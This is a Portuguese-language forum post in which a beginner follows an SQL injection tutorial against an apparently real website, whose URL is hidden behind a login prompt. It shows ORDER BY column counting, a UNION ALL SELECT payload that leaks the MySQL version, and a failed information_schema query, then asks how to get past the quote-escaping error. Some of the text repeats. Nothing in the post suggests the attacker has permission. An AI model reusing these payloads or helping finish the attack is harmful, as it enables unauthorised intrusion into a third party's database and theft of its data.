Olá Pessoal .. Estou começando agor ameus estudos com SqlInjection. Ja tenho uma noçao muito boa de sql e programação web. Estou seguindo aqui um tutorial. Es os passos que eu fiz:
Site:
Descobrindo o numero de colunas da tabela:
Descobrindo a versao do Base de Dados:
Citação:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45 --
Resultado: 5.0.92-community-log
O problema é justamente nesse ponto. Após essa etapa, estou tentando conseguir o nome da tabela usando a seguinte sql:
Mas o browser exibe o seguinte erro:
Já tentei usar algumas variações para ver se conseguia resolver esse erro mas o mesmo persiste.. T.T
Alguem saberia me dizer o que fazer para passar dessa etapa?
Site:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "SEM ERRO"
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "COM ERRO"
Logo a tabela possui 45 colunas ...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45 -- "COM ERRO"
Logo a tabela possui 45 colunas ...
Citação:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45 --
Resultado: 5.0.92-community-log
O problema é justamente nesse ponto. Após essa etapa, estou tentando conseguir o nome da tabela usando a seguinte sql:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45 from information_schema.tables where table_schema = '5.0.92-community-log' limit 0,1--
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'5.0.92-community-log\' limit 0,1--' at line 1
Alguem saberia me dizer o que fazer para passar dessa etapa?
Comment